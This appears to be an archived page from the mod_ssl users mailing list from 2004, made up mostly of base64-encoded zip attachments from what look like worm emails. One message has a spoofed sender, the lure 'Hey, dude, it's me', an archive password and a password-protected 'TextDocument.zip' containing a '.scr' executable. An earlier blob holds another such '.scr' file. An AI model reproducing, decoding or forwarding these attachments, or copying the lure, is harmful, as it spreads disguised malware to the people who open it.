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
AAA=

----------rrcucpbhftrxutjyuwns--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  3 23:54:01 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 88540A8A95; Wed,  3 Mar 2004 23:54:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maquinaoii (gtDEI-NATgw.dei.uc.pt [193.137.203.232])
	by master.modssl.org (Postfix) with SMTP id CD0C0A8A93
	for ; Wed,  3 Mar 2004 23:53:48 +0100 (CET)
Date: Wed, 03 Mar 2004 22:54:13 +0000
To: modssl-users@modssl.org
Subject: Hey, dude, it's me ^_^ :P
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------jvhthtyqycwlwwhnwvmx"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------jvhthtyqycwlwwhnwvmx
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Looking  forward for a  response :P
 
..btw,  "16702" is a  password  for  archive

----------jvhthtyqycwlwwhnwvmx
Content-Type: application/octet-stream; name="TextDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextDocument.zip"

UEsDBAoAAQAAAGC0YzCfGwmoBlIAAPpRAAALAAAAbmRzdndrcy5zY3LzTQlfG+kU7T/ehvt5
DV0OKFmLi7Vu3+2DhYJqOVr+CuhNrevZs+GdzAOdbzJepNv2olnMCyO6uTmQuwajSe/eJPgz
0tEInBUL7FehKj7obJFwrpFpXUraTpK7nvBsFYEs1Uona7lh/nrWnNoyUV/T1k+7H3GBs47P
USsSI5k16YXa6F1OJmh+GITKL/9VufjScsdEToDK8tTSJ4npEjMABbTve28CTgne868ObFH0
b70uiRuTShQA4NzjMNUQNC/0XqDMguFg7F6aVBUoXfIpC4PijYKVWjwIQ/zvg+b++Zt3RNo5
M+176PedYhGdSgiMKloLt3aJhsjgs6OGOgv5Nv7Tj973TanRfPQj07tzLihaSJSV8zAoy3hj
q+dZnktmpamBNUD83Qyx0Zwll+whwljtMW9joTXgmczsSbVADsiYo3tktVPI6KNOUYzamEDy
evOF5h/byUw+2ahoHx5wMVGMDL5hrXBt8hZ7v0TnVMTj9p47W+CcOyEkZ+Pkc8vaGvICFv7x
lfPpwORVJL8kL8aVwtbpQhoPHJ4yP9andiXQIYfPg4eUqscWyrUCoWibZ5Rk01uWoRoVBJHt
VWjccouWGBg+4v4zfa0dmoftCamSvDfGVlZFHy5J/T7Xbcw+9qzvzw+tM+2pO+erpYlmmkZw
rpqUFj6QCwf3m6f5ZOhT7BHpWzhF147oBBudrQYOM99yDk6fboi3dOofS8/HYmJn6y7tgeZr
Q10KLN3b4GuyCx/9G8q8WFqMmZnLtrbVEXB5dY7zLpKlru9mU8nvS4K0Xi8zd2OY1P/eBgrr
qdvk0xdhHKIx2PsXQnZOsImtlVS0Gn3QjZA84wU2bpa13qJXCCBDI1mrxQVPjTctMIr+0m/w
H1nfEeg+W0S3PMegWYrZCmugK1iz22n0cRISy/ePRo6TPmnDNB4O7JUmZNMyJtxxLLs0arS8
